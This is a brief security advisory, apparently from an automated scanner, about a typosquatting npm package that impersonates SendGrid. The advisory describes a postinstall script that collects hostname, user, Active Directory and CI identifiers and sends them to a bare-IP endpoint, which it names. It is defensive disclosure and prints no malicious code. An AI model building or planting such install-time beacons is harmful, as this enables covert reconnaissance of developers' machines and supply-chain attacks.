sendgrid-sdk @0.2.4

Summary

Package impersonates the official SendGrid npm packages (@sendgrid/*) but ships no SDK functionality — index.js exports an empty object. Its sole purpose is a postinstall recon beacon. On npm install , postinstall.js collects extensive installer-side identifiers — hostname, reverse-DNS FQDN, OS user, USERPROFILE, Active Directory domain (USERDNSDOMAIN, USERDOMAIN, LOGONSERVER), proxy/VPN/ZScaler environment signals, OneDrive corporate flag, install working directory, and CI repository identifiers (GitHub/GitLab/CircleCI/Travis/Bitbucket/Azure/Jenkins URLs and npm registry) — and transmits them via plain HTTP GET to http://46.224.67.169:3000/ping with each field as a query parameter (pkg, addomain, fullpath, etc.). The combination of name impersonation, empty SDK surface, and unsolicited fingerprinting of corporate AD/CI environments to a bare-IP HTTP endpoint is recon staging for follow-on supply-chain or phishing attacks. README framing this as a "honeypot" does not constitute installer consent — the package is published to the public npm registry where any developer mistyping the SendGrid name will trigger the beacon.

Source: amazon-inspector (08f1d48bc557c6afa69c74455fe35f34ed0992082dc30fc09d032523d2329f63)